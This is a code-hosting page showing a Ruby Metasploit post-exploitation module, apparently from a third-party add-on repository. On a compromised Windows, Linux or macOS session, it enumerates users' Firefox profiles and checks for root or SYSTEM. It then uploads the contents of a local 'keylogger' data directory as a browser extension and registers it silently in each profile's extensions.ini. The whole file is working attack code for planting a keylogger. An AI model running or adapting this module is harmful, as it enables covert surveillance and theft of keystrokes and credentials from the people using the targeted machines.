PageRenderTime 42ms CodeModel.GetById 17ms RepoModel.GetById 1ms app.codeStats 0ms

/modules/post/multi/manage/firefox_install_addon.rb

https://bitbucket.org/opexxx/msf-addons
Ruby | 322 lines | 277 code | 41 blank | 4 comment | 48 complexity | 21217322a5634e53345f376064a06626 MD5 | raw file
    

  1. require 'msf/core'
    2. 

  2. require 'rex'
    3. 

  3. require 'msf/core/post/file'
    4. 

  4. 

  5. class Metasploit3 < Msf::Post
    6. 

  6. 

  7. 	include Msf::Post::File
    8. 

  8. 

  9. 	def initialize(info={})
    10. 

  10. 		super( update_info(info,
    11. 

  11. 			'Name'           => 'Multi Manage Install Firefox Addon',
    12. 

  12. 			'Description'    => %q{
    13. 

  13. 			},
    14. 

  14. 			'License'        => MSF_LICENSE,
    15. 

  15. 			'Author'         => ['vpb'],
    16. 

  16. 			'Version'        => '$Revision: 666 $',
    17. 

  17. 			'Platform'       => ['windows', 'linux', 'bsd', 'unix', 'osx'],
    18. 

  18. 			'SessionTypes'   => ['meterpreter', 'shell' ]
    19. 

  19. 		))
    20. 

  20. 	end
    21. 

  21. 

  22. 	def run
    23. 

  23. 		print_status("Determining session platform and type...")
    24. 

  24. 		case session.platform
    25. 

  25. 		when /unix|linux|bsd/
    26. 

  26. 			@platform = :unix
    27. 

  27. 			paths = enum_users_unix
    28. 

  28. 		when /osx/
    29. 

  29. 			@platform = :osx
    30. 

  30. 			paths = enum_users_unix
    31. 

  31. 		when /win/
    32. 

  32. 			@platform = :windows
    33. 

  33. 			if session.type == "shell"
    34. 

  34. 				print_error "Only meterpreter sessions are supported on Windows hosts"
    35. 

  35. 				print_error "Try upgrading the session to a Meterpreter session via \"sessions -u <opt>\""
    36. 

  36. 				return
    37. 

  37. 			else
    38. 

  38. 				drive = session.fs.file.expand_path("%SystemDrive%")
    39. 

  39. 				os = session.sys.config.sysinfo['OS']
    40. 

  40. 			end
    41. 

  41. 			if os =~ /Windows 7|Vista|2008/
    42. 

  42. 				@appdata = '\\AppData\\Roaming'
    43. 

  43. 				@users = drive + '\\Users'
    44. 

  44. 			else
    45. 

  45. 				@appdata = '\\Application Data'
    46. 

  46. 				@users = drive + '\\Documents and Settings'
    47. 

  47. 			end
    48. 

  48. 

  49. 			print_status("Enumerating users checking for Firefox installs...")
    50. 

  50. 			paths = enum_users_windows
    51. 

  51. 		else
    52. 

  52. 			print_error("Unsupported platform #{session.platform}")
    53. 

  53. 			return
    54. 

  54. 		end
    55. 

  55. 		if paths.nil?
    56. 

  56. 			print_error("No users found with a Firefox directory")
    57. 

  57. 			return
    58. 

  58. 		end
    59. 

  59. 

  60. 		upload_addon(paths)
    61. 

  61. 	end
    62. 

  62. 

  63. 	def enum_users_unix
    64. 

  64. 		id = whoami
    65. 

  65. 		if id.empty? or id.nil?
    66. 

  66. 			print_error("This session is not responding, perhaps the session is dead")
    67. 

  67. 		end
    68. 

  68. 

  69. 		if @platform == :osx
    70. 

  70. 			home = "/Users/"
    71. 

  71. 		else
    72. 

  72. 			home = "/home/"
    73. 

  73. 		end
    74. 

  74. 

  75. 		if got_root?
    76. 

  76. 			userdirs = session.shell_command("ls #{home}").gsub(/\s/, "\n")
    77. 

  77. 			userdirs << "/root\n"
    78. 

  78. 		else
    79. 

  79. 			print_status("We do not have root privileges")
    80. 

  80. 			print_status("Checking #{id} account for Firefox")
    81. 

  81. 			firefox = session.shell_command("ls #{home}#{id}/.mozilla/firefox/").gsub(/\s/, "\n")
    82. 

  82. 

  83. 			firefox.each_line do |profile|
    84. 

  84. 				profile.chomp!
    85. 

  85. 				next if profile =~ /No such file/i
    86. 

  86. 

  87. 				if profile =~ /\.default/
    88. 

  88. 						print_status("Found Firefox Profile for: #{id}")
    89. 

  89. 						return [home + id + "/.mozilla/" + "firefox/" + profile + "/"] 
    90. 

  90. 				end
    91. 

  91. 			end
    92. 

  92. 			return
    93. 

  93. 		end
    94. 

  94. 

  95. 		# we got root check all user dirs
    96. 

  96. 		paths = []
    97. 

  97. 		userdirs.each_line do |dir|
    98. 

  98. 			dir.chomp!
    99. 

  99. 			next if dir == "." || dir == ".."
    100. 

  100. 

  101. 			dir = home + dir + "/.mozilla/firefox/" if dir !~ /root/
    102. 

  102. 			if dir =~ /root/
    103. 

  103. 				dir += "/.mozilla/firefox/"
    104. 

  104. 			end
    105. 

  105. 

  106. 			print_status("Checking for Firefox Profile in: #{dir}")
    107. 

  107. 

  108. 			stat = session.shell_command("ls #{dir}")
    109. 

  109. 			if stat =~ /No such file/i
    110. 

  110. 				print_error("Mozilla not found in #{dir}")
    111. 

  111. 				next
    112. 

  112. 			end
    113. 

  113. 			stat.gsub!(/\s/, "\n")
    114. 

  114. 			stat.each_line do |profile|
    115. 

  115. 				profile.chomp!
    116. 

  116. 				if profile =~ /\.default/
    117. 

  117. 					print_status("Found Firefox Profile in: #{dir+profile}")
    118. 

  118. 					paths << "#{dir+profile}"
    119. 

  119. 				end
    120. 

  120. 			end
    121. 

  121. 		end
    122. 

  122. 		return paths
    123. 

  123. 	end
    124. 

  124. 

  125. 	def enum_users_windows
    126. 

  126. 		paths = []
    127. 

  127. 

  128. 		if got_root?
    129. 

  129. 			session.fs.dir.foreach(@users) do |path|
    130. 

  130. 				next if path =~ /^\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService$/
    131. 

  131. 				firefox = @users + "\\" + path + @appdata
    132. 

  132. 				dir = check_firefox(firefox)
    133. 

  133. 				if dir
    134. 

  134. 					dir.each do |p|
    135. 

  135. 						paths << p
    136. 

  136. 					end
    137. 

  137. 				else
    138. 

  138. 					next
    139. 

  139. 				end
    140. 

  140. 			end
    141. 

  141. 		else # not root
    142. 

  142. 			print_status("We do not have SYSTEM checking #{whoami} account for Firefox")
    143. 

  143. 			path = @users + "\\" + whoami + @appdata
    144. 

  144. 			paths = check_firefox(path)
    145. 

  145. 		end
    146. 

  146. 		return paths
    147. 

  147. 	end
    148. 

  148. 

  149. 	def check_firefox(path)
    150. 

  150. 		paths = []
    151. 

  151. 		path = path + "\\Mozilla\\"
    152. 

  152. 		print_status("Checking for Firefox directory in: #{path}")
    153. 

  153. 

  154. 		stat = session.fs.file.stat(path + "Firefox\\profiles.ini") rescue nil
    155. 

  155. 		if !stat
    156. 

  156. 			print_error("Firefox not found")
    157. 

  157. 			return
    158. 

  158. 		end
    159. 

  159. 

  160.         ff_found=false
    161. 

  161. 

  162. 		session.fs.dir.foreach(path) do |fdir|
    163. 

  163. 			if fdir =~ /Firefox/i and @platform == :windows
    164. 

  164. 				#paths << path + fdir + "Profiles\\"
    165. 

  165.                 ff_found=true
    166. 

  166. 				print_good("Found Firefox installed")
    167. 

  167. 				break
    168. 

  168. 			else
    169. 

  169. 				#paths << path + fdir
    170. 

  170.                 ff_found=true
    171. 

  171. 				print_status("Found Firefox installed")
    172. 

  172. 				break
    173. 

  173. 			end
    174. 

  174. 		end
    175. 

  175. 

  176. 		if not ff_found
    177. 

  177. 			print_error("Firefox not found")
    178. 

  178. 			return
    179. 

  179. 		end
    180. 

  180. 

  181. 		print_status("Locating Firefox Profiles...")
    182. 

  182. 		print_line("")
    183. 

  183. 		path += "Firefox\\Profiles\\"
    184. 

  184. 

  185. 		# we should only have profiles in the Profiles directory store them all
    186. 

  186. 		begin
    187. 

  187. 			session.fs.dir.foreach(path) do |pdirs|
    188. 

  188. 				next if pdirs == "." or pdirs == ".."
    189. 

  189. 				print_good("Found Profile #{pdirs}")
    190. 

  190. 				paths << path + pdirs 
    191. 

  191. 			end
    192. 

  192. 		rescue
    193. 

  193. 			print_error("Profiles directory missing")
    194. 

  194. 			return
    195. 

  195. 		end
    196. 

  196. 

  197. 		if paths.empty?
    198. 

  198. 			return nil
    199. 

  199. 		else
    200. 

  200. 			return paths
    201. 

  201. 		end
    202. 

  202. 	end
    203. 

  203. 

  204.     def get_file_as_string(filename)
    205. 

  205.         data = ''
    206. 

  206.         f = ::File.open(filename, "r") 
    207. 

  207.         f.each_line do |line|
    208. 

  208.             data += line
    209. 

  209.         end
    210. 

  210.         return data
    211. 

  211.     end
    212. 

  212. 

  213. 	def upload_addon(paths)
    214. 

  214.         lpath = ::File.join(Msf::Config.install_root, "data", "post","keylogger")
    215. 

  215. 		paths.each do |path|
    216. 

  216.             print_status("Planting to #{path}") 
    217. 

  217.             if session.type=="meterpreter"    
    218. 

  218.                 extpath=path+ "\\extensions"
    219. 

  219.     
    220. 

  220.                 begin
    221. 

  221.                     session.fs.dir.mkdir(extpath)
    222. 

  222.                 rescue
    223. 

  223.                     print_status("Extensions directory already exists")
    224. 

  224.                 end
    225. 

  225. 

  226.                 extpath=extpath+'\\asdf@asdf' #TODO  randomize 
    227. 

  227.                 begin
    228. 

  228.                     session.fs.dir.mkdir(extpath)
    229. 

  229.                 rescue
    230. 

  230.                 end
    231. 

  231.                
    232. 

  232.                 for direntry in Dir[lpath+'/**/'].sort{|a,b| a.split(/\//).size <=> b.split(/\//).size}
    233. 

  233.                     begin
    234. 

  234.                         direntry=direntry[lpath.size..direntry.size].gsub("/","\\")
    235. 

  235.                         print_status("Creating #{extpath+direntry}")
    236. 

  236.                         session.fs.dir.mkdir(extpath+direntry)
    237. 

  237.                     rescue
    238. 

  238.                         print_error("Could not create #{direntry}")
    239. 

  239.                     end
    240. 

  240.                 end
    241. 

  241.             end
    242. 

  242.             if session.type != "meterpreter"
    243. 

  243.                 extpath=path+"/extensions"
    244. 

  244.                 begin
    245. 

  245.                     session.shell_command("mkdir #{extpath}")
    246. 

  246.                 rescue
    247. 

  247.                     print_status("Extensions directory already exists")
    248. 

  248.                 end
    249. 

  249. 

  250.                 extpath=extpath+"/asdf@asdf" # TODO randomize
    251. 

  251.                 
    252. 

  252.                 begin
    253. 

  253.                     session.shell_command("mkdir #{extpath}")
    254. 

  254.                 rescue
    255. 

  255.                 end
    256. 

  256.                 
    257. 

  257.                 for direntry in Dir[lpath+'/**/'].sort{|a,b| a.split(/\//).size <=> b.split(/\//).size}
    258. 

  258.                     begin
    259. 

  259.                         direntry=direntry[lpath.size..direntry.size]
    260. 

  260.                         print_status("Creating #{extpath+direntry}")
    261. 

  261.                         session.shell_command("mkdir #{extpath+direntry}")
    262. 

  262.                     rescue
    263. 

  263.                         print_error("Could not create #{direntry}")
    264. 

  264.                     end
    265. 

  265.                 end
    266. 

  266. 

  267.             end
    268. 

  268. 

  269.             for entry in Dir[lpath+'/**/*']
    270. 

  270.                 begin
    271. 

  271.                     entry=entry[lpath.size..entry.size]
    272. 

  272.                     if @platform == :windows
    273. 

  273.                         remote_entry=entry.gsub("/","\\")
    274. 

  274.                     else
    275. 

  275.                         remote_entry=entry
    276. 

  276.                     end
    277. 

  277. 

  278.                     print_status("Uploading #{::File.join(lpath,entry)} to #{extpath+remote_entry}");
    279. 

  279.                     write_file(extpath+remote_entry,get_file_as_string(::File.join(lpath,entry)))
    280. 

  280.                 rescue 
    281. 

  281.                     print_error("Could not upload #{entry}")
    282. 

  282.                 end
    283. 

  283.             end
    284. 

  284. 

  285. 

  286.             if @platform == :windows
    287. 

  287.                 slash="\\"
    288. 

  288.             else
    289. 

  289.                 slash="/"
    290. 

  290.             end
    291. 

  291.             print_status("Registering extension in #{path+slash}extensions.ini")
    292. 

  292. 

  293.             append_file(path+slash+"extensions.ini","\nExtensionASDF="+extpath+"\n") # TODO randomize
    294. 

  294.         end  
    295. 

  295. 	end
    296. 

  296. 

  297. 	def got_root?
    298. 

  298. 		case @platform
    299. 

  299. 		when :windows
    300. 

  300. 			if session.sys.config.getuid =~ /SYSTEM/
    301. 

  301. 				return true
    302. 

  302. 			else
    303. 

  303. 				return false
    304. 

  304. 			end
    305. 

  305. 		else # unix, bsd, linux, osx
    306. 

  306. 			ret = whoami
    307. 

  307. 			if ret =~ /root/
    308. 

  308. 				return true
    309. 

  309. 			else
    310. 

  310. 				return false
    311. 

  311. 			end
    312. 

  312. 		end
    313. 

  313. 	end
    314. 

  314. 

  315. 	def whoami
    316. 

  316. 		if @platform == :windows
    317. 

  317. 			return session.fs.file.expand_path("%USERNAME%")
    318. 

  318. 		else
    319. 

  319. 			return session.shell_command("whoami").chomp
    320. 

  320. 		end
    321. 

  321. 	end
    322. 

  322. end
    323. 

  323.